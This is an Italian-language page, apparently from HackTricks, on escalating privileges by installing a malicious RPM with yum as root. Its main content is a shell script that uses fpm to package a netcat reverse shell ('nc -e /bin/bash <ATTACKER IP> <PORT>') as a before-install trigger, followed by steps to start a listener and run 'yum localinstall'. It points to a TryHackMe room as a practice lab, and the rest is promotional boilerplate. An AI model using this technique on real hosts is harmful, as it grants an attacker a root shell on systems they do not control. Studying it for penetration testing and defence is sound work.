3.9 KiB
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!
Altri modi per supportare HackTricks:
- Se vuoi vedere la tua azienda pubblicizzata su HackTricks o scaricare HackTricks in PDF Controlla i PIANI DI ABBONAMENTO!
- Ottieni il merchandising ufficiale di PEASS & HackTricks
- Scopri The PEASS Family, la nostra collezione di NFT esclusivi
- Unisciti al 💬 gruppo Discord o al gruppo Telegram o seguici su Twitter 🐦 @carlospolopm.
- Condividi i tuoi trucchi di hacking inviando PR a HackTricks e HackTricks Cloud github repos.
Ulteriori esempi su yum possono essere trovati su gtfobins.
Esecuzione di comandi arbitrari tramite pacchetti RPM
Verifica dell'ambiente
Per sfruttare questo vettore, l'utente deve essere in grado di eseguire comandi yum come utente con privilegi elevati, ad esempio root.
Un esempio funzionante di questo vettore
Un esempio funzionante di questa vulnerabilità può essere trovato nella stanza daily bugle su tryhackme.
Creazione di un pacchetto RPM
Nella sezione seguente, illustrerò come creare un pacchetto RPM che includa una reverse shell utilizzando fpm.
L'esempio di seguito crea un pacchetto che include un trigger before-install con uno script arbitrario che può essere definito dall'attaccante. Quando installato, questo pacchetto eseguirà il comando arbitrario. Ho utilizzato un semplice esempio di reverse netcat shell a scopo dimostrativo, ma questo può essere modificato a piacimento.
EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR
Catturare una shell
Utilizzando l'esempio precedente e assumendo che yum
possa essere eseguito come utente con privilegi elevati.
- Trasferire il pacchetto rpm sull'host
- Avviare un listener sul proprio host locale, ad esempio il listener netcat di esempio
- Installare il pacchetto vulnerabile con il comando
yum localinstall -y exploited-1.0-1.noarch.rpm
Impara l'hacking di AWS da zero a esperto con htARTE (HackTricks AWS Red Team Expert)!
Altri modi per supportare HackTricks:
- Se vuoi vedere la tua azienda pubblicizzata su HackTricks o scaricare HackTricks in formato PDF, consulta i PACCHETTI DI ABBONAMENTO!
- Ottieni il merchandising ufficiale di PEASS & HackTricks
- Scopri The PEASS Family, la nostra collezione di esclusive NFT
- Unisciti al 💬 gruppo Discord o al gruppo Telegram o seguici su Twitter 🐦 @carlospolopm.
- Condividi i tuoi trucchi di hacking inviando PR ai repository GitHub di HackTricks e HackTricks Cloud.